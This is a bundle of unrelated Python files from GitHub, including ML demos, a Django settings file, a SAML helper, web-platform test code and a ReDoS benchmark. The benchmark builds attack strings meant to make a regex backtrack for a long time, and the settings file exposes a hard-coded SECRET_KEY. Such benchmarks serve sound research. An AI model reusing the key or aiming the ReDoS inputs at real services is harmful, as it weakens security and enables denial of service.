07aebc8436388522c9187ba82736dcfd7ad184a5 | a142b049668648f5a3ffb4714a9d472ff9f5e5e8 | /keras1/keras51_Tokenizer.py | f3f733838bea78c799af6bc85922b82620ebdf72 | [] | no_license | yunnyisgood/Tensorflow | 237944a3251b608bd688f1096618e55317265037 | 6af04eca3c51815509e53d65d03e471177b9e02f | refs/heads/main | 2023-08-09T14:35:28.939447 | 2021-09-13T14:02:20 | 2021-09-13T14:02:20 | 384,322,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.utils import to_categorical
text = '나는 진짜 매우 맛있는 밥을 진짜 마구 마구 먹었다.'
token = Tokenizer()
token.fit_on_texts([text])
print(token.word_index)
# {'진짜': 1, '마구': 2, '나는': 3, '매우': 4, '맛있는': 5, '밥을': 6, '먹었다': 7}
x = token.texts_to_sequences([text])
print(x)
# [[3, 1, 4, 5, 6, 1, 2, 2, 7]]
word_size = len(token.word_index)
print(word_size) # 7
print(type(x))
x = to_categorical(x)
print(x)
print(x.shape)
'''
[[[0. 0. 0. 1. 0. 0. 0. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 1. 0. 0. 0.]
[0. 0. 0. 0. 0. 1. 0. 0.]
[0. 0. 0. 0. 0. 0. 1. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 1.]]]
(1, 9, 8)
''' | [
"cyeon0801@gmail.com"
] | cyeon0801@gmail.com |
4149763b5973c1df83a28fbbfac81d7ff11885af | 7fdf4c04baed5f429110045d555e384dc71e08f1 | /python/modules.py | 3e63a5694605d15b25b2648b1729092cf52fa80b | [] | no_license | andrsj/Python-Edu | 8f3d336fc35c325ca546fb508d49f7ee892b5b7d | a2f09876b977f071ff11576ad987af477b0889c6 | refs/heads/master | 2021-03-18T22:20:27.854983 | 2020-04-23T18:05:04 | 2020-04-23T18:05:04 | 247,105,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,574 | py | # MODULES
m.__dict__ # Атрибути модуля
m.__doc__ # Doc
m.__name__ # Name
m.__file__ # File
m.__path__ # Path
# module: spam.py
__all__ = [ ‘bar’, ‘Spam’ ]
# Ці імена будуть імпортовані при команді from spam import *
# Перевірити, чи модуль був запущений як програма
if __name__ == "__main__":
pass
else:
# Файл, був імпортований як модуль
pass
# Copy
copy()
deepcopy()
# sys
sys.float_info
sys.maxsize
sys.path
sys:
stdout | stdin | stderr
# Decimal
import decimal
x = decimal.Decimal("3.4")
y = decimal.Decimal("4.5")
a = x * y # a = decimal.Decimal(‘15.30’)
b = x / y # b = decimal.Decimal(‘0.7555555555555555555555555556’)
decimal.getcontext().prec = 3
c = x * y # c = decimal.Decimal(‘15.3’)
d = x / y # d = decimal.Decimal(‘0.756’)
a = decimal.Decimal(42) # Створить Decimal("42")
b = decimal.Decimal("37.45") # Створить Decimal("37.45")
c = decimal.Decimal((1,(2,3,4,5),-2)) # Створить Decimal("-23.45")
d = decimal.Decimal("Infinity")
e = decimal.Decimal("NaN")
x.exp()
x.ln()
x.log10()
x.sqrt()
# Fractions
>>> f = fractions.Fraction(3,4)
>>> f
Fraction(3, 4)
>>> g = fractions.Fraction(“1.75”)
>>> g
Fraction(7, 4)
>>> h = fractions.Fraction.from_float(3.1415926)
Fraction(3537118815677477, 1125899906842624)
>>>
# Datetime
import datetime
x = datetime.datetime.now()
print(x)
print(x.strftime("%_"))
VVVVVVVVVVVVVVVVVVVVVVVV
%a Weekday, short version Wed
%A Weekday, full version Wednesday
%w Weekday as a number 0-6, 0 is Sunday 3
%d Day of month 01-31 31
%b Month name, short version Dec
%B Month name, full version December
%m Month as a number 01-12 12
%y Year, short version, without century 18
%Y Year, full version 2018
%H Hour 00-23 17
%I Hour 00-12 05
%p AM/PM PM
%M Minute 00-59 41
%S Second 00-59 08
%f Microsecond 000000-999999 548513
%z UTC offset +0100
%Z Timezone CST
%j Day number of year 001-366 365
%U Week number of year, Sunday as the first day of week, 00-53 52
%W Week number of year, Monday as the first day of week, 00-53 52
%c Local version of date and time Mon Dec 31 17:41:00 2018
%x Local version of date 12/31/18
%X Local version of time 17:41:00
%% A % character % | [
"61803449+andrsj@users.noreply.github.com"
] | 61803449+andrsj@users.noreply.github.com |
052f814055a4ea1b0c87f9a67983858539c629f3 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/matrix/03621ea5957641a2ad11d0d2303103e5.py | 5c1164e155a96298fac1d2fac55d3c2c202a80e4 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,857 | py | class Matrix:
def __init__(self, data):
"""Create a matrix object and fill it with the provided data.
The data must be the matrix in ASCII format, with embedded newlines,
e.g. '1 2 3\n4 5 6'.
"""
self.height = 0
self.width = 0
self._data = []
for row in data.split("\n"):
self.height += 1
row_values = [int(v) for v in row.strip().split()]
if not self.width:
self.width = len(row_values)
elif self.width != len(row_values):
raise ValueError(
"Row %d has an unexpected number of values" % self.height)
self._data.extend(row_values)
@property
def rows(self):
"""A list of matrix rows."""
return [
self._data[row*self.width : (row+1)*self.width]
for row in xrange(0, self.height)
]
@property
def columns(self):
"""A list of matrix columns."""
return [
self._data[column :: self.width]
for column in xrange(0, self.width)
]
def _data_index(self, column, row):
if row < 0 or row > self.height:
raise IndexError("Row %d does not exist" % row)
if column < 0 or column > self.width:
raise IndexError("Column %d does not exist" % column)
return column + row * self.width
def get(self, column, row):
"""Returns the value from the matrix at coordinate (column, row)."""
return self._data[self._data_index(column, row)]
def set(self, column, row, value):
"""Set the value for the matrix at coordinate (column, row)."""
self._data[self._data_index(column, row)] = value
def sum(self):
"""Returns the sum of all values in the matrix."""
return sum(self._data)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
77c0e37ed35697f5c5bdcd4b5739f3cce73b4472 | ffd0603413ec537e14f977196b564f4523e29545 | /mysite/mysite/settings.py | 0fa56d38541987273f522ac81761da22f61ab163 | [] | no_license | sorwarduet/blog_project_new | 3b58d407c22bf3f4fbfe796356cc073082f80c9a | 98c37fb474860971dc28a5a1730826d31c9d6f6c | refs/heads/master | 2021-08-23T11:53:14.324873 | 2017-12-04T20:07:05 | 2017-12-04T20:07:05 | 113,047,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR=os.path.join(BASE_DIR,'blog/templates/blog')
STATIC_DIR=os.path.join(BASE_DIR,'blog/static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'g50b-v83-g_4yd8$lmtqx4%!xeg-s4)8z(i0694ku0*dxtaj3^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT=os.path.join(BASE_DIR,'static')
LOGIN_REDIRECT_URL='/'
STATICFILES_DIRS=[
STATIC_DIR,
] | [
"esorwar.cse@gmail.com"
] | esorwar.cse@gmail.com |
50a976545023e2867694a4b0470c533b5ec610fb | a1794eabcc58e65cf49087c846a8cf1e7ee83941 | /desktop/core/ext-py/pysaml2-2.4.0/src/saml2/eptid.py | b2551b44f6ce3ae5220ca03de959043a020dbc10 | [
"Apache-2.0"
] | permissive | BelieveDjango/hue | 22502a5f250d5df4c3adc1afa2e3b659e8888089 | d6cbec42d8bcb1e9c0f729b5a22a38abb2c6dee4 | refs/heads/master | 2023-08-31T01:20:23.906783 | 2016-05-19T23:51:28 | 2016-05-19T23:51:28 | 59,281,298 | 0 | 0 | Apache-2.0 | 2023-08-11T05:06:18 | 2016-05-20T09:16:05 | Python | UTF-8 | Python | false | false | 1,368 | py | # An eduPersonTargetedID comprises
# the entity name of the identity provider, the entity name of the service
# provider, and a opaque string value.
# These strings are separated by "!" symbols. This form is advocated by
# Internet2 and may overtake the other form in due course.
import hashlib
import shelve
import logging
logger = logging.getLogger(__name__)
class Eptid(object):
def __init__(self, secret):
self._db = {}
self.secret = secret
def make(self, idp, sp, args):
md5 = hashlib.md5()
for arg in args:
md5.update(arg.encode("utf-8"))
md5.update(sp)
md5.update(self.secret)
md5.digest()
hashval = md5.hexdigest()
return "!".join([idp, sp, hashval])
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, value):
self._db[key] = value
def get(self, idp, sp, *args):
# key is a combination of sp_entity_id and object id
key = ("__".join([sp, args[0]])).encode("utf-8")
try:
return self[key]
except KeyError:
val = self.make(idp, sp, args)
self[key] = val
return val
class EptidShelve(Eptid):
def __init__(self, secret, filename):
Eptid.__init__(self, secret)
self._db = shelve.open(filename, writeback=True)
| [
"erickt@cloudera.com"
] | erickt@cloudera.com |
0ac1d93bb67a120a72ecf7874363b5562af9dee2 | cdd499a39bc4c5152ade3b106abf0eddfea2a133 | /analysis.py | 691bec189d8b79e88a843ea347462c50ddaefefc | [] | no_license | joel99/illusions | 307f7f7b94061ad67ca90702529e64cc49fc21e5 | 3f4adeebc38e94ef15a1b6f169754a3274319c3a | refs/heads/main | 2023-04-29T21:16:23.418173 | 2021-05-05T00:00:36 | 2021-05-05T00:00:36 | 352,145,024 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,524 | py | #%%
from pathlib import Path
import os.path as osp
from yacs.config import CfgNode as CN
import matplotlib.pyplot as plt
from PIL import Image
import torch
import torch.nn.functional as F
from config.default import get_config
from model import SaccadingRNN
from dataset import UniformityDataset
seed = 0
config = './config/base.yaml'
config = './config/debug.yaml'
# config = './config/debug2.yaml'
# config = './config/base.yaml'
# config = './config/base_e2e.yaml'
config = './config/large.yaml'
config = './config/large_adv.yaml'
version = 5
version = 0
version = 2
config = './config/large_adv_sin.yaml'
version = 4
config = './config/large_sin.yaml'
# version = 18
version = 19
# config = './config/snakes_slow.yaml'
# version = 0
# version = 2
# version = 3
config = './config/snakes.yaml'
version = 9
config = './config/snakes_large.yaml'
version = 0
config = './config/snakes_cifar.yaml'
version = 6
# TODO add state_dict
config = './config/snakes_ssim.yaml'
version = 3
config = './config/pdi.yaml'
version = 0
# version = 3
config = './config/pdi_polar.yaml'
version = 7
config = './config/circ.yaml'
version = 0
config = './config/troxler_batch_clean.yaml'
config = './config/troxler_batch.yaml'
version = 0
# config = './config/pdi_fourier.yaml'
# config ='./config/pdi_fourier_noise.yaml'
# config = './config/pdi_fourier_random.yaml'
config = './config/pdi_fourier_noise_random.yaml'
version = 0 # Overfit
# version = 2 # Generalization
variant = osp.split(config)[1].split('.')[0]
config = get_config(config)
root = Path(f'runs/{variant}-{seed}/lightning_logs/')
# * This is the default output, if you want to play around with a different checkpoint load it here.
model_ckpt = list(root.joinpath(f"version_{version}").joinpath('checkpoints').glob("*"))[0]
weights = torch.load(model_ckpt, map_location='cpu')
model = SaccadingRNN(config)
model.load_state_dict(weights['state_dict'])
model.eval()
if config.TASK.NAME == 'UNIFORMITY':
dataset = UniformityDataset(config, split="train")
else:
dataset = UniformistyDataset(config, split="train", dataset_root=f'./data/{config.TASK.NAME}', augment=['rotate'])
# dataset = UniformityDataset(config, split="test", dataset_root=f'./data/{config.TASK.NAME}')
index = 0
# index = 2
# index = 9
# index = 25000
# index = 700
# index = 750
# index = 800
image = dataset[index]
proc_view = UniformityDataset.unpreprocess(image).permute(1, 2, 0)
proc_view = proc_view.squeeze(-1)
plt.imshow(proc_view)
sac_length = 50
saccades = model._generate_saccades(image, length=sac_length)[:, :1]
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
# Note, simply using saccades twice in a row is OOD.
# all_views, noised_views, patches, state = model.predict(image)
# Hm, doesn't seem to matter.... am I looking at the right output?
# Why is my loss higher than reported?
print(all_views.size(), patches.size())
loss1 = F.mse_loss(all_views[1], patches[0])
loss1 = F.mse_loss(all_views[1:], patches)
print(loss1)
print(saccades.float().mean())
plt.imshow(image.squeeze(0))
plt.axis('off')
# Wow, there's barely any loss... what gives?
# losses = [F.mse_loss(all_views[i+1], patches[i]) for i in range(49)]
# plt.plot(losses)
#%%
# It don't even look like the right image.
times = [0, 10, 20, 30]
f, axes = plt.subplots(len(times), 2, sharex=True, sharey=True)
for i, t in enumerate(times):
true_image = all_views[t + all_views.size(0) - patches.size(0), 0]
# true_image = noised_views[t + all_views.size(0) - patches.size(0), 0]
proc_true = UniformityDataset.unpreprocess(true_image).permute(1, 2, 0)
proc_true = proc_true.squeeze(-1)
# axes[i, 0].imshow(proc_true[..., 2])
axes[i, 0].imshow(proc_true)
pred_image = patches[t, 0]
print(F.mse_loss(true_image, pred_image)) # how can my average in the previous timestep be lower than all my samples here?
proc_pred = UniformityDataset.unpreprocess(pred_image).permute(1, 2, 0)
proc_pred = proc_pred.squeeze(-1)
# axes[i, 1].imshow(proc_pred[..., 2])
axes[i, 1].imshow(proc_pred)
axes[0, 0].set_title('True')
axes[0, 1].set_title('Pred')
plt.savefig('test.png')
#%%
import numpy as np
step = 3
grid_h = np.linspace(0, image.size(-2)-1, step)
grid_w = np.linspace(0, image.size(-1)-1, step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid.unsqueeze(1), mode='patch').detach()
print(patches.size())
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, loc in zip(patches, grid):
belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = patch
f, axes = plt.subplots(1, 2, sharex=True, sharey=True)
print(saccades.size()) # ! I think there's a transpose happening
axes[0].scatter(*(saccades.T + w_span), color='white')
# Flip direction since saccade higher = matrix lower
axes[0].imshow(padded_image, origin='lower')
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief, origin='lower')
axes[1].set_title('Perceived')
axes[1].axis('off')
plt.savefig('test.png', dpi=300)
# %%
#%%
plt.imshow(image.squeeze(0))
plt.savefig('test.png', dpi=300)
#%%
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
fixate_saccades = model._generate_saccades(image, mode='fixate')
all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=None)
# all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=state)
step = 3
grid_h = np.linspace(0, image.size(-2), step)
grid_w = np.linspace(0, image.size(-1), step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
step_fixate = fixate_state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid, mode='patch').detach()
fixate_patches = model._predict_at_location(step_fixate, grid, mode='patch').detach()
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
fixate_belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, fixate_patch, loc in zip(patches, fixate_patches, grid):
belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = patch
fixate_belief[
loc[0]: loc[0] + 2 * w_span,
loc[1]: loc[1] + 2 * h_span
] = fixate_patch
f, axes = plt.subplots(1, 3, sharex=True, sharey=True)
axes[1].scatter(*(saccades.T + w_span), color='white')
axes[0].imshow(padded_image)
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief)
axes[1].set_title('Perceived')
axes[1].axis('off')
axes[2].imshow(fixate_belief)
axes[2].set_title('Fixation (w/o saccade)')
axes[2].axis('off')
axes[2].scatter(*(fixate_saccades.T + w_span), color='white')
plt.savefig('test.png', dpi=300)
| [
"joelye9@gmail.com"
] | joelye9@gmail.com |
6021df1a5e4afffdf7611d6391b4abe981929627 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2845/60765/274571.py | e890da8bf65c177ac99bcb7981532e0c0a99bf23 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
n=input()
# n,t=list(map(int,input().split()))
#serial=input().split()
a=list(map(int,input().split()))
b=list(map(int,input().split()))
n=len(b)
c=[[a[i],b[i]] for i in range(n)]
c.sort(key=lambda x:x[0])
# print(c)
result=[c[i][1]-c[i+1][1] for i in range(n-1)]
for i in range(n-1):
if result[i]>0:
print('Happy Alex')
break
elif i==n-2:
print('Poor Alex')
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
c6406ced2221fb7e2c50769c42574bc91280dd5a | 0adb68bbf576340c8ba1d9d3c07320ab3bfdb95e | /regexlib/2021-5-15/python_re_test_file/regexlib_7745.py | ffca8351109d1a4bdc6278e4c8266b6f3ecf2f39 | [
"MIT"
] | permissive | agentjacker/ReDoS-Benchmarks | c7d6633a3b77d9e29e0ee2db98d5dfb60cde91c6 | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | refs/heads/main | 2023-05-10T13:57:48.491045 | 2021-05-21T11:19:39 | 2021-05-21T11:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | # 7745
# ^\w*[-]*\w*\\\w*$
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:""+"0"*10000+"! _1_POA(i)"
import re
from time import perf_counter
regex = """^\w*[-]*\w*\\\w*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "" + "0" * i * 10000 + "! _1_POA(i)"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *10000}: took {DURATION} seconds!") | [
"liyt@ios.ac.cn"
] | liyt@ios.ac.cn |
9cd31045bab54a275a87b2929087052987ccfdcd | 04b1803adb6653ecb7cb827c4f4aa616afacf629 | /third_party/blink/web_tests/external/wpt/xhr/resources/inspect-headers.py | e71f671ced34ff3d447467ea4098e6e000ffd8f7 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | Samsung/Castanets | 240d9338e097b75b3f669604315b06f7cf129d64 | 4896f732fc747dfdcfcbac3d442f2d2d42df264a | refs/heads/castanets_76_dev | 2023-08-31T09:01:04.744346 | 2021-07-30T04:56:25 | 2021-08-11T05:45:21 | 125,484,161 | 58 | 49 | BSD-3-Clause | 2022-10-16T19:31:26 | 2018-03-16T08:07:37 | null | UTF-8 | Python | false | false | 1,356 | py | def get_response(raw_headers, filter_value, filter_name):
result = ""
for line in raw_headers.headers:
if line[-2:] != '\r\n':
return "Syntax error: missing CRLF: " + line
line = line[:-2]
if ': ' not in line:
return "Syntax error: no colon and space found: " + line
name, value = line.split(': ', 1)
if filter_value:
if value == filter_value:
result += name + ","
elif name.lower() == filter_name:
result += name + ": " + value + "\n"
return result
def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method, x-request-content-type, x-request-query, x-request-content-length"))
headers.append(("content-type", "text/plain"))
filter_value = request.GET.first("filter_value", "")
filter_name = request.GET.first("filter_name", "").lower()
result = get_response(request.raw_headers, filter_value, filter_name)
return headers, result
| [
"sunny.nam@samsung.com"
] | sunny.nam@samsung.com |
69e8b76324acdc71454c9bed7115bb9276cc104c | 09f205f74070c53e694d52f0bc72e203a2fd224f | /docs_src/query_params/tutorial006.py | d764c2a863e0809462be935bbc57ab24d2df9b29 | [
"MIT"
] | permissive | RunningIkkyu/fastapi | 53c02fed44b9e30e8617c94ec902be7ca579e42b | 05736c40d3fbb008fd9cdbe1adb8fcef7676e0c6 | refs/heads/master | 2021-05-18T07:58:33.640797 | 2020-05-21T01:36:47 | 2020-05-21T01:36:47 | 251,189,158 | 2 | 0 | MIT | 2020-05-21T01:36:49 | 2020-03-30T03:13:43 | Python | UTF-8 | Python | false | false | 256 | py | from fastapi import FastAPI
app = FastAPI()
@app.get("/items/{item_id}")
async def read_user_item(item_id: str, needy: str, skip: int = 0, limit: int = None):
item = {"item_id": item_id, "needy": needy, "skip": skip, "limit": limit}
return item
| [
"tiangolo@gmail.com"
] | tiangolo@gmail.com |
0556fc6274db7bf87fb08c6b7c4833091be52242 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-7522.py | 0de294240c35bc14c520c5cb061c04af8134d8d0 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,291 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
